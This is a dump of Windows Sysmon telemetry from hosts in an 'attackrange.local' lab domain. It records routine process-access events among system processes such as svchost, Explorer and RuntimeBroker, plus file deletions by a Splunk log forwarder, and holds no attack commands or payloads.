07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.568{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0264472556B328E70EF6B59DFA299DC1,SHA256=E7717DD9A5BA0AF5D43BD8A131E7FC66944918F4EA8934845F18800A648086F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:36.040{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D8AB265B427CF9079B0BCBAA36B716B,SHA256=4899F171C80010CE5CE61CD61718F2A6C0EA8461DBC24B83B1CAB1C596B1E1EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.530{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D498827454FA836F4D977F5BD6F7B22E,SHA256=EF74CE8DFA675F007256562F2296286AB07C918859E9AEEBF5B41861A8B224AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.283{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\
System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.283{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.283{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.283{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.230{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.230{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.230{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.214{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.214{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.214{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT